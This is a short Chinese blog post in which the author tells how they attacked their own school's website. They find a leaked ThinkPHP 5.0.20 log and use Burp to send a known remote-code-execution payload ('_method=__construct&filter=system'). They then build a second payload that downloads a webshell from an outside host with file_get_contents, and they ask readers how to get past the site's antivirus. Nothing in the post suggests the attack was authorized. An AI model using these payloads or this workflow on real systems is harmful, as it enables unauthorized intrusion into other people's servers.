一期超水的文章
事情的起因要从一只蝙蝠说起.....
连自己学校都不放过 这是人干的事? 不对 貌似每一个hxd都是先拿自己学校开刀的
话不多说,我们先打开网站瞧瞧
发现网站是PHP5.5.38的,阿帕奇2.4 大概主站看了一下没什么收获
看见了个在线咨询好家伙直接把我屏蔽
主站看上去是没什么可以利用的了 于是逃出我的御剑
扫到了后台 http://xx.xxbdqn.cn/index/index/login.html
本来想着该一手返回包尝试绕过,,失败
看了下域名,寻思着这不会是TP的吧?
看看存不存在日志泄露.log 发现了这个
直接报错好家伙
代码往下翻Version:5.0.20好办了拿出我的Burp 开始对着输入框抓包
然后发送到 repeater里面 如图(以上)
然后把u=qsadmin&p=1232312412 删除掉 然后直接打payload
它使用了thinkphp5.0.20 网上有很多案例
Payload:_method=__construct&filter=system&a=命令
比如net user , dir 之类的
RCE接下来方便多了
先测试一下echo写个文本
echo "1111" »test.txt
失败了,怎么会这样
发现assert和eval都禁用了
假的,我不信
构造语句:
_method=__construct&filter[]=assert&method=get&server[REQUEST_METHOD]=file_put_contents('a.php',file_get_contents('http://xxx/a.php'))
进程查看了一下有360
想了很多方法绕都不行
尝试绕过(马尝试了各种绕过方法)都没成功,一传马就Ban ip,,杀死进程也就那几个指令,又不能内核删,技术菜是原罪,在这里希望有懂得师傅可以请教。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论